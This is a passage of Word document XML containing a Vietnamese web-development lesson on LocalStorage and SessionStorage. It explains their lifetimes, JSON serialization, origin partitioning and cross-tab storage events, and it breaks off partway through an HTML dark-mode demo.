    <w:p w14:paraId="3153AADE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Đảm bảo nút bấm bị vô hiệu hóa (disabled = true) trong suốt thời gian đang gọi mạng để tránh việc người dùng nhấp liên tục gây quá tải (spam request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEE0DC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bài 4: LocalStorage / SessionStorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28954C70" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Khái niệm cốt lõi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2298D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Storage API — Lưu trữ Trạng thái tại Phía Khách (Client-Side Storage):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2220B6EE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Web Storage API cung cấp cơ chế lưu trữ an toàn các cặp khóa-giá trị (Key-Value) ngay bên trong trình duyệt của người dùng. So với kỹ thuật lưu trữ truyền thống bằng Cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C167E7C" w14:textId="1AAEFFB5" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Cookie có dung lượng rất nhỏ (</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>≈4</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
          </m:rPr>
          <m:t>KB</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t>) và tự động bị đính kèm vào mọi HTTP Request gửi lên server (gây lãng phí băng thông mạng).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FF4A77" w14:textId="4AB34E25" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Web Storage cung cấp không gian lưu trữ lớn hơn rất nhiều (tối thiểu </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>5</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
          </m:rPr>
          <m:t>MB</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> trên mỗi origin) và hoàn toàn nằm cục bộ ở máy khách, không bao giờ bị tự động gửi lên server qua mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD894E5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phân biệt Chuyên sâu: LocalStorage vs. SessionStorage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D4CA9D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Cả hai chia sẻ chung 100% bộ phương thức API (setItem, getItem, removeItem, clear), nhưng khác nhau căn bản về vòng đời và phạm vi chia sẻ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DD66F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LocalStorage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Dữ liệu </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tồn tại vĩnh viễn (Persistent Storage)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">. Dữ liệu không bao giờ bị xóa ngay cả khi người dùng tắt trình duyệt hoặc khởi động lại máy tính (chỉ mất đi khi người dùng xóa cache hoặc mã JavaScript gọi hàm xóa). Dữ liệu được chia sẻ xuyên suốt giữa </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mọi Tab và Cửa sổ</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> cùng mở chung một Origin (giao thức + domain + cổng).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC81B4B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SessionStorage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Dữ liệu chỉ tồn tại theo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phiên làm việc của một Tab duy nhất (Per-tab Session Lifecycle)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t>. Dữ liệu lập tức bị hủy bỏ hoàn toàn ngay khi người dùng đóng chiếc Tab đó lại. Nếu người dùng mở cùng một URL đó trên một Tab mới bên cạnh, Tab mới đó sẽ sở hữu một vùng nhớ SessionStorage hoàn toàn độc lập, rỗng tinh và không chia sẻ dữ liệu với Tab cũ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBE436" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tuần tự hóa Dữ liệu (Serialization with JSON):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FECEE5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Web Storage API theo thiết kế chuẩn của W3C </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chỉ chấp nhận lưu trữ dữ liệu dưới dạng chuỗi văn bản (DOMString)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t>. Mọi kiểu dữ liệu nguyên thủy hay cấu trúc phức tạp khi đưa vào storage nếu không cẩn thận sẽ bị ép kiểu sang chuỗi. Do đó, để lưu trữ các cấu trúc dữ liệu thực tế như Mảng (Array) hay Đối tượng (Object), kỹ sư bắt buộc phải áp dụng quy trình tuần tự hóa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37541AE2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi lưu trữ: Sử dụng JSON.stringify(data) để biến đổi Object thành chuỗi JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309814F6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi truy xuất: Sử dụng JSON.parse(string) để hoàn nguyên chuỗi JSON trở lại thành Object trong bộ nhớ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568F86F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Cơ chế hoạt động chi tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F96B6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Cơ chế phân vùng theo chính sách cùng nguồn (Same-Origin Policy) và sự kiện storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C159C88" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin Partitioning (Phân vùng theo nguồn gốc):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Trình duyệt tạo một bảng cơ sở dữ liệu khóa-giá trị cục bộ được cô lập nghiêm ngặt theo bộ ba: Protocol + Host + Port. Ví dụ: [https://example.com](https://example.com) và [http://example.com](http://example.com) (khác giao thức), hoặc [https://example.com:8080](https://example.com:8080) (khác cổng) là các vùng nhớ tách biệt hoàn toàn, không thể đọc trộm dữ liệu của nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1422F423" w14:textId="669B19E2" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous Disk I/O (Ghi đĩa đồng bộ):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Khi gọi localStorage.setItem('key', 'value'), trình duyệt thực hiện thao tác ghi đồng bộ xuống ổ cứng. Vì mang tính đồng bộ (Synchronous/Blocking), nếu lạm dụng lưu trữ các chuỗi dữ liệu quá lớn (</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>&gt;2-3</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
          </m:rPr>
          <m:t>MB</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t>), nó có thể làm đơ luồng giao diện chính của trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC9764" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Tab Synchronization via storage Event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4448A567" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi dữ liệu trong localStorage bị thay đổi (thêm, sửa, xóa) tại Tab A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE4499" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Trình duyệt tự động phát thanh một sự kiện mang tên storage tới </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tất cả các Tab khác (Tab B, Tab C)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> đang mở cùng origin đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A75CE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Tab A (nơi trực tiếp gọi lệnh sửa) không nhận sự kiện này, nhưng Tab B và C nhận được đối tượng StorageEvent (chứa key, oldValue, newValue), cho phép đồng bộ hóa dữ liệu thời gian thực giữa các tab mà không cần dùng WebSocket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6199A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51312ADF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Người dùng tương tác tại Tab A ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66469C94" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1C55D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D5454" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ localStorage.setItem('theme', 'dark') ] ──► [ Lưu xuống Ổ cứng (Same-Origin DB) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090908AA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9E15D5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                        Trình duyệt tự động phát tán sự kiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB86F6F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797D41D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B10764" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                    [ Tab B (Đang mở cùng trang web) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307583A3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                    Lắng nghe: window.addEventListener('storage')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747C4CE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0755DC58" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F2D6B7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                    [ Tự động đổi theme sang dark theo Tab A! ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1623ED8B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ code / demo thực tế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5CB6C6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDCBC7F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653823A2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;html lang="vi"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBF357" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06732341" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C3581" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;title&gt;Quản Trị Trạng Thái Bền Vững bằng LocalStorage&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D54E0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE0C5D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D1057" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      font-family: system-ui, sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E48E187" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 24px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D00BEB4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      transition: background 0.3s, color 0.3s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0BDE2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A14D4F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    body.dark-mode {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FB11B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      background-color: #0f172a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA37BE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      color: #f8fafc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499532E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918FFC7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .settings-panel {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1936B5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border: 1px solid #cbd5e1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5554872F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2F037" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-radius: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556352B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      max-width: 400px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57425529" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9FBFC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4B037" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378F443" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F96B7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;div class="settings-panel"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85C54B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;h3&gt;Cài Đặt Ứng Dụng&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEADC7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498D9BD6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      &lt;input type="checkbox" id="theme-checkbox"&gt; Kích hoạt Giao diện Tối (Dark Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A033FD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;/label&gt;</w:t>
      </w:r>
    </w:p>
